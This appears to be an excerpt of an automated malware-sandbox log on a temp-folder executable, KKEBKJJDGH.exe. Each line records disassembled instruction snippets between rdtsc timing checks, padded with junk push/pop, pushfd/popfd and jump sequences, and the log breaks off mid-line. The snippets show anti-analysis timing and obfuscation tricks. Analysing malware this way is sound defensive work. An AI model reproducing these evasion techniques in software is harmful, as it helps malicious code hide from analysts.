Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10EBE second address: 4C10EDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10EDB second address: 4C10F0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, ax 0x00000010 jmp 00007F742CEB81D4h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10F0C second address: 4C10F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10F12 second address: 4C10F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10F16 second address: 4C10F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10F1A second address: 4C10F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F742CEB81D6h 0x0000000f mov eax, 42C3B991h 0x00000014 pop esi 0x00000015 mov cx, bx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F742CEB81CFh 0x00000021 jmp 00007F742CEB81D3h 0x00000026 popfd 0x00000027 mov si, 25CFh 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f movzx esi, di 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F742CEB81D3h 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C60028 second address: 4C6002E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C6002E second address: 4C60032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF00B4 second address: 4BF00BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF00BA second address: 4BF00BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF00BE second address: 4BF0177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F742CC44219h 0x0000000f jmp 00007F742CC44210h 0x00000014 pop ecx 0x00000015 mov eax, edi 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F742CC44213h 0x00000020 xor si, 4B1Eh 0x00000025 jmp 00007F742CC44219h 0x0000002a popfd 0x0000002b push esi 0x0000002c mov si, dx 0x0000002f pop edx 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007F742CC44216h 0x00000038 push dword ptr [ebp+04h] 0x0000003b jmp 00007F742CC44210h 0x00000040 push dword ptr [ebp+0Ch] 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F742CC44217h 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF01B7 second address: 4BF01BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF01BD second address: 4BF01C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4BF01C3 second address: 4BF01C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10B9F second address: 4C10BCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F742CC4420Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10BCC second address: 4C10BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10BD2 second address: 4C10BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10BD6 second address: 4C10C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F742CEB81D4h 0x00000010 jmp 00007F742CEB81D5h 0x00000015 popfd 0x00000016 jmp 00007F742CEB81D0h 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10C23 second address: 4C10C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10C27 second address: 4C10C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10C2D second address: 4C10C33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10C33 second address: 4C10C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10C37 second address: 4C10C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ch, 3Eh 0x0000000d mov esi, edi 0x0000000f popad 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov edx, esi 0x00000016 push eax 0x00000017 pop ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10C50 second address: 4C10C58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C1074E second address: 4C1075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC4420Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C1075F second address: 4C1077D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C1077D second address: 4C10781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10781 second address: 4C10787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10787 second address: 4C107A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 539FBC27h 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov edi, 2B5E5ECAh 0x00000014 movsx ebx, si 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C107A5 second address: 4C107AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C107AB second address: 4C107B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C107B0 second address: 4C107B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C107B6 second address: 4C107BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C1068E second address: 4C106A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C106A6 second address: 4C106AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C106AA second address: 4C106E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov ah, DFh 0x0000000c mov edx, 647F6A3Ah 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F742CEB81CAh 0x0000001e jmp 00007F742CEB81D5h 0x00000023 popfd 0x00000024 push ecx 0x00000025 pop ebx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C106E6 second address: 4C106EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C1040B second address: 4C10412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C10412 second address: 4C1042F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 call 00007F742CC4420Eh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov al, CEh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C1042F second address: 4C1049E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F742CEB81D9h 0x00000008 and cl, FFFFFFB6h 0x0000000b jmp 00007F742CEB81D1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov bx, si 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F742CEB81CAh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F742CEB81CDh 0x00000028 and cx, FCC6h 0x0000002d jmp 00007F742CEB81D1h 0x00000032 popfd 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C2026F second address: 4C20273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C20273 second address: 4C20279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C20279 second address: 4C20310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 5679C96Fh 0x00000008 pushfd 0x00000009 jmp 00007F742CC44214h 0x0000000e or ax, A198h 0x00000013 jmp 00007F742CC4420Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F742CC44216h 0x00000022 push eax 0x00000023 jmp 00007F742CC4420Bh 0x00000028 xchg eax, ebp 0x00000029 jmp 00007F742CC44216h 0x0000002e mov ebp, esp 0x00000030 jmp 00007F742CC44210h 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F742CC44217h 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F1E second address: 4C50F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F24 second address: 4C50F3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F3D second address: 4C50F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F41 second address: 4C50F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F47 second address: 4C50F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F4D second address: 4C50F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50F51 second address: 4C50F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C303D1 second address: 4C303D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C303D7 second address: 4C303DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C303DD second address: 4C30430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44218h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov edx, esi 0x00000011 movzx eax, bx 0x00000014 popad 0x00000015 and dword ptr [eax], 00000000h 0x00000018 jmp 00007F742CC44215h 0x0000001d and dword ptr [eax+04h], 00000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F742CC4420Dh 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C105E9 second address: 4C105EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C105EF second address: 4C105F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C30016 second address: 4C3001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3001C second address: 4C30020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C30020 second address: 4C3003E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov eax, 0B2FE47Bh 0x0000000f mov esi, 0BCE4D57h 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bh, D1h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3003E second address: 4C3005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC44218h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C30224 second address: 4C3027A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F742CEB81D2h 0x00000009 jmp 00007F742CEB81D5h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 mov esi, 4FC46A23h 0x0000001a push esi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F742CEB81D7h 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C3027A second address: 4C3027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C5069A second address: 4C506DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 6CCDE79Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F742CEB81D7h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F742CEB81D6h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c movzx ecx, di 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C506DC second address: 4C50714 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushfd 0x00000008 jmp 00007F742CC44210h 0x0000000d and ecx, 3BDEE098h 0x00000013 jmp 00007F742CC4420Bh 0x00000018 popfd 0x00000019 pop eax 0x0000001a popad 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov dh, F0h 0x00000021 mov esi, 31BA8299h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50714 second address: 4C507A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f mov eax, 24AA2E27h 0x00000014 popad 0x00000015 mov eax, dword ptr [774365FCh] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F742CEB81D8h 0x00000021 or cx, 5488h 0x00000026 jmp 00007F742CEB81CBh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F742CEB81D8h 0x00000032 and eax, 43B6B6E8h 0x00000038 jmp 00007F742CEB81CBh 0x0000003d popfd 0x0000003e popad 0x0000003f test eax, eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F742CEB81D5h 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C507A8 second address: 4C507D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F749F3A73AFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F742CC4420Dh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C507D2 second address: 4C507D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C507D8 second address: 4C507DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C507DC second address: 4C50834 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a pushad 0x0000000b mov di, 2ED8h 0x0000000f pushfd 0x00000010 jmp 00007F742CEB81D1h 0x00000015 jmp 00007F742CEB81CBh 0x0000001a popfd 0x0000001b popad 0x0000001c xor eax, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov esi, 6A177C77h 0x00000027 pushfd 0x00000028 jmp 00007F742CEB81CCh 0x0000002d or cx, 2068h 0x00000032 jmp 00007F742CEB81CBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50834 second address: 4C5084C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CC44214h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C5084C second address: 4C50850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50850 second address: 4C50867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F742CC4420Ah 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C50867 second address: 4C508BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F742CEB81D1h 0x00000009 and si, 33E6h 0x0000000e jmp 00007F742CEB81D1h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F742CEB81D0h 0x0000001a xor ah, FFFFFF88h 0x0000001d jmp 00007F742CEB81CBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 ror eax, cl 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C508BD second address: 4C508C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C508C4 second address: 4C508DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D6h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4C508DE second address: 4C509A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC4420Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007F742CC44216h 0x00000011 retn 0004h 0x00000014 nop 0x00000015 mov esi, eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a xor esi, dword ptr [002B0014h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push eax 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 push eax 0x00000027 call 00007F743162537Fh 0x0000002c push FFFFFFFEh 0x0000002e jmp 00007F742CC44210h 0x00000033 pop eax 0x00000034 jmp 00007F742CC44210h 0x00000039 ret 0x0000003a nop 0x0000003b push eax 0x0000003c call 00007F743162539Ch 0x00000041 mov edi, edi 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007F742CC4420Eh 0x0000004a and ax, 5108h 0x0000004f jmp 00007F742CC4420Bh 0x00000054 popfd 0x00000055 pushad 0x00000056 mov ecx, 29BF3395h 0x0000005b pushfd 0x0000005c jmp 00007F742CC44212h 0x00000061 adc ax, F368h 0x00000066 jmp 00007F742CC4420Bh 0x0000006b popfd 0x0000006c popad 0x0000006d popad 0x0000006e xchg eax, ebp 0x0000006f jmp 00007F742CC44216h 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 